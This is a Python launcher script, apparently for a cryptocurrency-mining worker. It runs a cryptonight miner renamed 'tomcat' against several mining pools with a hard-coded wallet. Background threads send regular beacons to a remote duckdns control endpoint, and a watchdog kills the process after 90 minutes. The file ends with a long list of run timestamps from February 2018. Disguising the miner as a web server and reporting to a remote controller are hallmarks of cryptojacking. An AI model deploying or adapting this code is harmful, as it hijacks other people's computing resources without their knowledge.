import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:38:04.090053
#2018-02-17 16:24:07.342422
#2018-02-17 18:12:06.196228
#2018-02-17 20:00:09.128673
#2018-02-17 21:49:05.286992
#2018-02-17 23:35:05.852200
#2018-02-18 01:24:01.578707
#2018-02-18 03:11:04.519401
#2018-02-18 05:01:06.095795
#2018-02-18 06:53:01.794143
#2018-02-18 08:40:08.485887
#2018-02-18 10:26:05.978038
#2018-02-18 12:12:04.922819
#2018-02-18 13:58:02.183739
#2018-02-18 15:48:04.260451
#2018-02-18 17:37:05.466487
#2018-02-18 19:25:06.534230
#2018-02-18 21:10:08.173238
#2018-02-18 22:57:06.014026
#2018-02-19 00:44:06.183386
#2018-02-19 02:31:04.106497
#2018-02-19 04:17:04.616815
#2018-02-19 06:02:06.502933
#2018-02-19 07:49:07.573699
#2018-02-19 09:39:05.959458
#2018-02-19 11:29:08.585348
#2018-02-19 13:17:01.894961
#2018-02-19 15:04:04.404244
#2018-02-19 16:51:09.339980
#2018-02-19 18:38:04.367169
#2018-02-19 20:23:06.721381
#2018-02-19 22:11:07.576295
#2018-02-19 23:58:05.483313
#2018-02-20 01:44:06.733468
#2018-02-20 03:33:03.741954
#2018-02-20 05:20:09.443321
#2018-02-20 07:04:06.253452
#2018-02-20 08:50:03.090533
#2018-02-20 10:34:01.980616
#2018-02-20 12:19:09.679723
#2018-02-20 14:06:06.116180
#2018-02-20 15:48:18.767726
#2018-02-20 17:28:06.136868
#2018-02-20 19:18:02.165105
#2018-02-20 21:06:01.542881
#2018-02-20 22:50:08.520929
#2018-02-21 00:34:04.112533
#2018-02-21 02:21:05.268612
#2018-02-21 04:08:01.406190
#2018-02-21 05:55:05.615040
#2018-02-21 07:43:14.215979
#2018-02-21 09:29:01.389191
#2018-02-21 11:18:02.212900
#2018-02-21 13:06:09.322376
#2018-02-21 14:53:01.901005
#2018-02-21 16:42:07.751672
#2018-02-21 18:33:04.254479
#2018-02-21 20:18:06.142293
#2018-02-21 22:05:09.041793
#2018-02-21 23:51:07.352255
#2018-02-22 01:41:04.800639
#2018-02-22 03:29:02.192261
#2018-02-22 05:16:04.712860
#2018-02-22 07:02:01.613483
#2018-02-22 08:48:04.788004
#2018-02-22 10:36:08.661719
#2018-02-22 12:22:08.900003
#2018-02-22 14:08:08.872099
#2018-02-22 15:54:07.471913
#2018-02-22 17:42:06.878655
#2018-02-22 19:30:06.962470
#2018-02-22 21:22:07.742262
#2018-02-22 23:09:05.399593
#2018-02-23 00:56:06.519832
#2018-02-23 02:44:06.139846
#2018-02-23 04:33:02.085980
#2018-02-23 06:19:06.102173
#2018-02-23 08:07:01.728416
#2018-02-23 10:20:01.500698
#2018-02-23 12:14:10.531169
#2018-02-23 14:02:09.795399
#2018-02-23 15:53:11.053640
#2018-02-23 17:38:06.867485
#2018-02-23 19:24:09.831947
#2018-02-23 21:09:05.680616
#2018-02-23 22:55:08.627297
#2018-02-24 00:42:09.144390
#2018-02-24 02:33:05.669853
#2018-02-24 04:26:07.479910
#2018-02-24 06:11:06.868910
#2018-02-24 07:58:04.074427
#2018-02-24 09:43:03.982489
#2018-02-24 11:38:05.632392
#2018-02-24 13:28:01.987117
#2018-02-24 15:16:05.534502
#2018-02-24 17:05:07.224564
#2018-02-24 18:56:05.992878
#2018-02-24 20:43:07.139133
#2018-02-24 22:57:03.850418
#2018-02-25 02:13:07.150660
#2018-02-25 05:36:07.379954
#2018-02-25 11:35:06.823529